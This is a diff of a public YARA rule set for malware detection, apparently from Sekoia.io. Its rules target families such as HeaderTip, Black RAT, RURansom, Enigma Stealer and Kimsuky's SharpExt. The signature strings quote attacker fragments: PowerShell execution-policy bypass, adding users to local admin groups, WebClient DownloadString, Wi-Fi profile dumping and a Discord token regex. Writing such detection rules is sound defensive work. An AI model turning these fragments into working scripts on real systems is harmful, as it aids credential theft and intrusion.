+		logic_hash = "1251df19c521e9ee9da307d56eea265265f2bee4a8e7eec099e4ebfb4e2bd7a2"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Passlib test utility - Version %s" wide
-		$ = "-l <full_path_to_dll_to_load_into_lsass> (arbitrary dll injection into LSASS)" wide
-		$ = "-u <dll_to_unload_from_lsass> (arbitrary dll uninjection from LSASS)" wide
-		$ = "DLL %s injection was successful requested!" wide
-		$ = "DLL %s uninjection was successful requested!" wide
-		$ = "Process %s was succesfully created with full privileges and system integrity!" wide
-		$ = "full_path_to_volatile_payload_dll" wide
-		$ = "%s: [%s]:[%s] (http_only:%d)" wide
-		$ = "LEX server has been deployed at lsass." wide
-		$ = "LEX client is using volatile payload at: %s" wide
-		$ = "LEX client is using permanent payload at: %s" wide
-		$ = "Passlib execution finished" wide
-		$ = "Running on Passlib version %ws" wide
-		$ = "There was a problem initializing passlib manager interface." wide
-		$ = "Passlib running without high integrity" wide
-		$ = "About to dump passwords through passlib manager interface" wide
+		$str01 = "Before Work" ascii
+		$str02 = "DEFENDER OFF" ascii
+		$str03 = "Stop Service" ascii
+		$str04 = "Kill All (Default)" ascii
+		$str05 = "Keyboard EN" ascii
+		$str06 = "After Work" ascii
+		$str07 = "Del Shadow Log" ascii
+		$str08 = "Kill OSK" ascii
+		$str09 = "PWGEN" ascii
+		$str10 = "Character :" ascii
+		$str11 = "PW GEN" ascii
+		$str12 = "Cobian UI Pass" ascii
+		$str13 = "Credssp" ascii
+		$str14 = "Username :" ascii
+		$str15 = "Password :" ascii
+		$str16 = "TSpeedButton" ascii
+		$str17 = "Ab1q2w3e!" ascii
+		$str18 = "PC Details" ascii
+		$str19 = "Mimi Dump" ascii
+		$str20 = "MIMI Dump" ascii
+		$str21 = "powershell -ExecutionPolicy Bypass -File \"" wide
+		$str22 = "lastlog.txt" wide
+		$str23 = "$AdminGroupName = (Get-WmiObject -Class Win32_Group -Filter 'LocalAccount = True AND SID = \"S-1-5-32-544\"').Name" wide
+		$str24 = "net localgroup $AdminGroupName " wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 1500KB and all of them
+		uint16( 0 ) == 0x5a4d and 17 of them
 }
 
-rule SEKOIA_Backdoor_Win_Headertip : FILE
+rule SEKOIA_Backdoor_Win_Blackrat : FILE
 {
 	meta:
-		description = "Detect HeaderTip backdoor used by the Chinese threat actor Scarab. This backdoor has its hardcoded C2 in strings"
+		description = "Detect Andariel's Black RAT malware"
 		author = "Sekoia.io"
-		id = "82899406-4ec3-41d2-bcc1-bdd1ee440e77"
-		date = "2022-03-25"
+		id = "3a5a6290-6344-45ce-8929-ea5a4451840f"
+		date = "2023-09-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_headertip.yar#L4-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "289764df590cd2719d4d4e0dd66f7d8ebb4714d42eea4bb76c47a2b867a113de"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_blackrat.yar#L4-L33"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4edf1335e357ebc02e4abb51cd8d808ae39e649cf19cdb3ec667c9cf313181a9"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e1523185eac41a615b8d2af8b7fd5fe07b755442df2836041be544dff6881237"
-		hash2 = "da8a98d9b9a3c176ba44fb69ad0a820a971950e05f1eb0c4bbbf6c2fbb748bdc"
-		hash3 = "63a218d3fc7c2f7fcadc0f6f907f326cc86eb3f8cf122704597454c34c141cf1"
+		hash1 = "c2500a6e12f22b16e221ba01952b69c92278cd05632283d8b84c55c916efe27c"
 
 	strings:
-		$post = "POST" wide
-		$ua = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" wide
+		$s1 = "I:/01___Tools/02__RAT/Black/Client_Go/Client.go"
+		$s2 = "I:/01___Tools/02__RAT/Black/Client_Go/Define.go"
+		$s3 = "I:/01___Tools/02__RAT/Black/Client_Go/Screenshot.go"
+		$x1 = "RAT/Black/Client"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and $post at 7256 and $ua at 7304 and filesize < 10KB ) or pe.imphash ( ) == "60d01115d6baa0f214990c6e19339133" or hash.md5 ( pe.rich_signature.clear_data ) == "48f9cf422144c033e2ca183f72587910"
+		uint16be( 0 ) == 0x4d5a and ( all of ( $s* ) or #x1 >= 3 ) or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "74c4cdc9d33fc63aee7ae9659b6f8d24" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "298948afbe85985025e176605ee21176" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "e5ca54c5def3c7a950e6d4034dc86277" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "440ae899aea859458df5b6de7dbc5b34" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "98e46f76b965ffb58f6cd53ff8dc91c0" )
 }
-rule SEKOIA_Rootkit_Win_Purplefox_360_Tct : FILE
+rule SEKOIA_Apt_Emissarypanda_Sysupdate_Removing_Tool : FILE
 {
 	meta:
-		description = "Detects Purple Fox payloads used during end-2021 and 2022 campaigns based on characteristics shared by TrendMicro details."
+		description = "Detects the SysUpdate removing tool"
 		author = "Sekoia.io"
-		id = "e992d574-6a44-4bea-97e2-6d5579ce8d01"
-		date = "2022-03-28"
+		id = "711d059c-6229-49ef-aa20-a04d505838dc"
+		date = "2022-08-03"
 		modified = "2024-12-19"
-		reference = "https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rootkit_win_purplefox_360_tct.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6b4ca65bc05ea1e8036140a62b94c8b75afe30a5e37cae9a5ae2a9c828cd6275"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_emissarypanda_sysupdate_removing_tool.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6a23fac99f26f4b0f9099e435ad53d9e83bf1322d190c565abf0c06dceeeaf34"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232107,26 +232749,27 @@ rule SEKOIA_Rootkit_Win_Purplefox_360_Tct : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$rar = "Rar!"
-		$str0 = "svchost.txt"
-		$str1 = "rundll3222.exe"
-		$str2 = "ojbkcg.exe"
+		$ = "KsWAYYYXXsFUCK" wide
+		$ = "remove Services:%s %d" wide
+		$ = "remove dir:%s %d" wide
+		$ = "remove reg %d" wide
 
 	condition:
-		$rar at 0 and all of ( $str* ) and filesize > 800KB and filesize < 2800KB
+		uint16be( 0 ) == 0x4d5a and filesize < 11MB and 2 of them
 }
-rule SEKOIA_Apt_Emberbear_Credpump_Strings : FILE
+
+rule SEKOIA_Wiper_Win_Ruransom : FILE
 {
 	meta:
-		description = "Detects CredPump backdoor"
+		description = "Detect the RURansom malware"
 		author = "Sekoia.io"
-		id = "c9898e34-4ab8-49d6-9c8a-3fce592449e2"
-		date = "2023-02-28"
+		id = "7bf3694b-c689-482f-88cd-b1f3b86bbc36"
+		date = "2022-11-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_emberbear_credpump_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6f2c96fe3f314221626b4c053658af0e7231f151886f10eb1d69e07ea3e5c634"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/wiper_win_ruransom.yar#L4-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e16cfe7a273bfa01e2ae56174e6ea10a84d42542a62dda5e7b095a0c30082a31"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232134,57 +232777,51 @@ rule SEKOIA_Apt_Emberbear_Credpump_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "User=%s Pass=%s Host=%s"
-		$ = "/etc/rc0.d/.rc0.d"
-		$ = "pam_get_authtok"
-		$ = "Password:"
+		$ = "RURansom"
+		$ = "AesCrypter"
+		$ = "RURansom" wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5A4D and all of them or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "e4b6b5b2b293d497ddf373ca9f7e97458328703d2769f451890ac48771c85070" )
 }
-rule SEKOIA_Apt_Gelsemium_Wolfsbane_Rootkit : FILE
+rule SEKOIA_Apt_Susp_Apt28_Uac0063_Malicious_Doc_Vba : FILE
 {
 	meta:
-		description = "Detects Gelsemium's WolfsBane rootkit"
+		description = "Detects some suspected APT28 document vba"
 		author = "Sekoia.io"
-		id = "e93f4515-62f5-4057-a464-aae11cbe0639"
-		date = "2024-11-22"
+		id = "58040dbd-09ae-4f9e-940d-3a522e7ccfbb"
+		date = "2024-07-25"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gelsemium_wolfsbane_rootkit.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "ba08e63ad65a9bdcdb1655f25d32c808"
-		logic_hash = "a7440e1b4c0bbff0d80d7152e3bfb0867abe9b0151b45f88aa656f3c9a55b303"
-		score = 75
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_susp_apt28_uac0063_malicious_doc_vba.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "fceffb8ae94cef3af21b2943131e94db9e0e67073de48d9d32601a245448d067"
+		logic_hash = "c57676b765364c5c51d2bf231b5fe858129b45ba837ec6554b353177bb16bd8a"
+		score = 65
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "__non_hooked_symbols"
-		$ = "__hidden_literals"
-		$ = "extract_type_2_socket_inode2"
-		$ = "/proc/%s/fd"
-		$ = "pluginkey" wide
-		$ = "mainpath" wide
-		$ = "hiderpath" wide
+		$ = { 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 30 }
+		$ = "ThisDocument" wide
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
+		uint32be( 0 ) == 0xd0cf11e0 and all of them
 }
-rule SEKOIA_Tool_Masky_Strings : FILE
+rule SEKOIA_Generic_Sharpshooter_Payload_10 : FILE
 {
 	meta:
-		description = "Detects Masky tool"
+		description = "Detects payload created by SharpShooter"
 		author = "Sekoia.io"
-		id = "542670ee-9f2e-4148-853d-a3f055bd584c"
-		date = "2022-08-23"
+		id = "477f8b92-e231-460c-8660-487d0a97f0e2"
+		date = "2023-02-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_masky_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "35dc536879d9464919028ace6b65b225455621035184d7b58468d259ccda62aa"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/generic_sharpshooter_payload_10.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6ded3f5b7e9c7f2c09e3bc0869e41775e4bb31a39e6fef8209f50f5091e8d2e2"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232192,27 +232829,25 @@ rule SEKOIA_Tool_Masky_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "caa1aa2e-8a2a-4f98-bc51-b7cf10663fa9" ascii
-		$s2 = "Masky" ascii
-		$s3 = "\\Windows\\Temp\\" wide
-		$s4 = "Length must be non-negative" wide
-		$s5 = "CSP does not contain a private key" wide
+		$ = "length = enc.GetByteCount_2(b);"
+		$ = "ms.Write(ba, 0, (length / 4) * 3);"
+		$ = "d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and 4 of them or $s1
+		all of them and filesize < 2MB
 }
-rule SEKOIA_Apt_Kimsuky_Powershell_Dropper_Strings : FILE
+rule SEKOIA_Apt_Kimsuky_Sharpext_Jsexfil_Strings : FILE
 {
 	meta:
-		description = "Detects a PowerShell dropper used by Kimsuky"
+		description = "Detects the exfiltration JS code of SharpExt"
 		author = "Sekoia.io"
-		id = "8b346e05-215b-46c0-82bf-fce3a65440f3"
-		date = "2024-06-11"
+		id = "c9ebd123-6450-4424-93d1-60322bd97bf6"
+		date = "2022-07-29"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_kimsuky_powershell_dropper_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e98f23ddf02049126786e9300e7b6661b2a74817b36e2f3a661b07b24ef4402d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_kimsuky_sharpext_jsexfil_strings.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "37ea72b369baaced89f30f655901cc4a9d6a70d00cfca3b92a1015aca64d4e2c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232220,26 +232855,26 @@ rule SEKOIA_Apt_Kimsuky_Powershell_Dropper_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "try { " ascii wide
-		$s2 = "); } catch(e){} } if ("
-		$s3 = "WScript.Sleep("
-		$s4 = " } catch(e) { }"
+		$ = "var req_url" ascii fullword
+		$ = "var newReqId" ascii fullword
+		$ = "chrome.tabs.query" ascii fullword
+		$ = "payload.message.flags = new Object();" ascii fullword
 
 	condition:
-		filesize > 500KB and $s1 at 0 and $s2 in ( filesize -1000 .. filesize ) and $s3 in ( filesize -1000 .. filesize ) and $s4 in ( filesize -1000 .. filesize )
+		all of them and filesize < 50KB
 }
-rule SEKOIA_Tool_Sy_Runas : FILE
+rule SEKOIA_Hacktool_Sharpview_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects SharpView based on strings."
 		author = "Sekoia.io"
-		id = "cb1f3707-6716-49b5-9fe0-45c5baf2e491"
-		date = "2023-08-23"
+		id = "585ead98-36d0-402c-b527-4dec308cb1c9"
+		date = "2022-02-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_sy_runas.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b606f921b0ff6adf0e6979d43be0ddf77e2967e703562f1dea4406d1f5b3f5fd"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_sharpview_strings.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "762e8d292e052cb0922743c2f5b14170e91fe440e05331892b20b5921e0559da"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232247,55 +232882,57 @@ rule SEKOIA_Tool_Sy_Runas : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "Sy_Runas.exe" ascii wide
-		$s2 = "password *.exe" ascii wide
-		$s3 = "This tools just work on webshell" ascii wide
-		$s4 = "Code By slls124@gmail.com" ascii wide
+		$ = "Args_Get_DomainGPOComputerLocalGroupMapping"
+		$ = "Args_Get_ForestGlobalCatalog"
+		$ = "Args_Find_DomainLocalGroupMember"
+		$ = "Args_Get_DomainFileServer"
+		$ = "Ex: SharpView.exe Method-Name" wide
+		$ = "[Get-PathAcl] error: {0}" wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 800KB and 5 of them
 }
-rule SEKOIA_Backdoor_Win_Rollsling : FILE
+
+rule SEKOIA_Backdoor_Win_Headertip : FILE
 {
 	meta:
-		description = "Detect Lazarus' RollSling malware (aka LazarLoader)"
+		description = "Detect HeaderTip backdoor used by the Chinese threat actor Scarab. This backdoor has its hardcoded C2 in strings"
 		author = "Sekoia.io"
-		id = "5ef23b9c-5bc5-4f02-b1b4-1af18a03241a"
-		date = "2023-10-24"
+		id = "82899406-4ec3-41d2-bcc1-bdd1ee440e77"
+		date = "2022-03-25"
 		modified = "2024-12-19"
-		reference = "https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_rollsling.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5cee25638bdc86b3ffb1c616943d647ca170c5c0140ae3e3118f56b504fa862f"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_headertip.yar#L4-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "289764df590cd2719d4d4e0dd66f7d8ebb4714d42eea4bb76c47a2b867a113de"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "d9add2bfdfebfa235575687de356f0cefb3e4c55964c4cb8bfdcdc58294eeaca"
-		hash2 = "48538a935ddf2cbeb4918d0ccf9372ec8e0a57c5fd145a584a9b1bb4ebbcd5ce"
-		hash3 = "18825be6b269087d7699f3d0aa2e6db2ae72ded36c56aa8e7b8a606dde3741fa"
-		hash4 = "645205e38dfdd560f6242ba717af1bfdd8e85baf5e710d724b853fe9808c4551"
-		hash5 = "455bab490a300d9d63b8777c223287c0a6a647ca7b98b96fd3236f83b8adc77b"
+		hash1 = "e1523185eac41a615b8d2af8b7fd5fe07b755442df2836041be544dff6881237"
+		hash2 = "da8a98d9b9a3c176ba44fb69ad0a820a971950e05f1eb0c4bbbf6c2fbb748bdc"
+		hash3 = "63a218d3fc7c2f7fcadc0f6f907f326cc86eb3f8cf122704597454c34c141cf1"
 
 	strings:
-		$s1 = "LookupPrivilegeVCreateRemoteThreAdjustTokenPriviOpenProcessToken"
+		$post = "POST" wide
+		$ua = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		( uint16( 0 ) == 0x5A4D and $post at 7256 and $ua at 7304 and filesize < 10KB ) or pe.imphash ( ) == "60d01115d6baa0f214990c6e19339133" or hash.md5 ( pe.rich_signature.clear_data ) == "48f9cf422144c033e2ca183f72587910"
 }
-rule SEKOIA_Dropper_Win_Konni_Cab : FILE
+rule SEKOIA_Loader_Win_Red0044_Powershell_May24 : FILE
 {
 	meta:
-		description = "Detect the CAB files used to drop the KONNI malware"
+		description = "Finds PowerShell scripts used in a malvertising campaign to deliver NetSupport RAT"
 		author = "Sekoia.io"
-		id = "87a209d5-667a-4a81-837a-660ab98c33c8"
-		date = "2023-09-26"
+		id = "ba3454b4-31cf-458d-8d78-c5cc5fa348ff"
+		date = "2024-05-03"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/dropper_win_konni_cab.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b49bb875d5ddd4b815da5bd184ec7f1d23cfb7ad316760c9a9876607245d0a95"
+		reference = "https://twitter.com/crep1x/status/1786150734121120075"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_red0044_powershell_may24.yar#L1-L26"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "73939f65b93b320b9e220ee284ea524864a6b05c7608213009ac5f00b3faeedc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -232303,79 +232940,94 @@ rule SEKOIA_Dropper_Win_Konni_Cab : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$magic = "MSCF"
-		$file2 = "check.bat"
-		$file3 = "wpnprv64.dll"
-		$file4 = "wpnprv32.dll"
+		$str01 = "Start-Job -ScriptBlock" ascii
+		$str02 = "Get-WmiObject" ascii
+		$str03 = "-Class Win32_OperatingSystem" ascii
+		$str04 = "-Class AntiVirusProduct" ascii
+		$str05 = "$_.Exception.Message" ascii
+		$str06 = ".DownloadString" ascii
+		$str07 = "New-Object Net.WebClient" ascii
+		$str08 = "myUserAgentHere" ascii
+		$str09 = "GetFolderPath('Desktop'))\\document.pdf" ascii
+		$str10 = "Receive-Job -Job" ascii
+		$str11 = "Start-Process" ascii
 
 	condition:
-		$magic at 0 and all of ( $file* )
+		8 of them and filesize < 20KB
 }
-rule SEKOIA_Hacktool_Duplicatedump_Strings : FILE
+rule SEKOIA_Apt_Dark_Pink_Pdb_Path : FILE
 {
 	meta:
-		description = "Detects Duplicate Dump"
+		description = "Detects PDB path of some Dark Pink sample"
 		author = "Sekoia.io"
-		id = "081d0124-4afe-418b-9767-3d987c0107ca"
-		date = "2023-11-22"
+		id = "695586dc-66de-4f9d-814a-2d81261a7357"
+		date = "2023-01-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_duplicatedump_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "feff083ed432781884941fc02eee6d6ce54f70f1b85d24db2f3e1d0147a81a7a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_dark_pink_pdb_path.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f67e0d50975697424313acc77a9c86e1c2b41fde1663e4f5d8f4765acb997775"
 		score = 75
-		quality = 80
+		quality = 76
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "7d872e921a4b4b1b8b295395099b0209" wide ascii
-		$ = "[+] Named pipe connected and replying with current PID" wide ascii
-		$ = "[X] Named pipe connection error:" wide ascii
-		$ = "[X] Error occur while compressing file:" wide ascii
-		$ = "[+] Dump file saved to" wide ascii
+		$s1 = "C:\\Users\\hoang\\source\\repos\\Cucky\\Cucky\\obj\\Release\\net46\\Cucky.pdb" wide ascii
+		$s2 = "C:\\Users\\build\\source\\repos\\CtealWebCredential\\Release\\CtealWebCredential.pdb" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 4 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and any of them
 }
-rule SEKOIA_Apt_Sidecopy_Cheex : FILE
+rule SEKOIA_Infostealer_Win_Enigma_Stealer_Module : FILE
 {
 	meta:
-		description = "Detects PDB path of Cheex"
+		description = "Find stealer module of Enigma Stealer based on specific strings"
 		author = "Sekoia.io"
-		id = "e9b57f15-e703-4367-b501-fa8a873e4455"
-		date = "2024-08-14"
+		id = "664fe8de-b406-4d63-9a4b-1c350b444f02"
+		date = "2023-01-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sidecopy_cheex.yar#L1-L16"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "825c7a1603f800ff247c8f3e9a1420af"
-		logic_hash = "e5561466b616c746b33c0c4a46e8bdb0859e55aef8896bc1b14e54838c1661ee"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_enigma_stealer_module.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "4d2fb518c9e23c5c70e70095ba3b63580cafc4b03f7e6dce2931c54895f13b2c"
+		logic_hash = "0a6615d65867a160e1c87fbcfe30090d44d7f5c25b3a904f8719be7b385b14bb"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "C:\\Users\\Dead Snake\\source\\repos\\cheex" ascii fullword
+		$eni01 = "enigma.common" nocase ascii wide
+		$eni02 = "--ENIGMA STEALER--" wide
+		$str01 = "SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')" wide
+		$str02 = "/C chcp 65001 && netsh wlan show profile | findstr All" wide
+		$str03 = "/C chcp 65001 && netsh wlan show networks mode=bssid" wide
+		$str04 = "[Open google maps]" wide
+		$str05 = "Stealerium.Target." ascii
+		$str06 = "--- ClipperBCH ---" wide
+		$str07 = "//setting[@name='Username']/value" wide
+		$str08 = "Stealer >> Failed recursive remove directory with passwords" wide
+		$str09 = "[a-zA-Z0-9]{24}\\.[a-zA-Z0-9]{6}\\.[a-zA-Z0-9_\\-]{27}|mfa\\.[a-zA-Z0-9_\\-]{84}" wide
+		$str10 = "^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16( 0 ) == 0x5A4D and 1 of ( $eni* ) and 4 of ( $str* )
 }
-rule SEKOIA_Apt_Sugardump_Credentials_Stealer_Http : FILE
+rule SEKOIA_Apt_Backdoordiplomaty_Custommerlinagent_Strings : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects custom variant of Merlin agent used by BackdoorDiplomaty"
 		author = "Sekoia.io"
-		id = "47d01ba8-9fdd-42d5-9f10-115f982dc133"
-		date = "2022-08-23"
+		id = "965693ba-93b8-4c52-9292-957884411968"
+		date = "2024-06-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
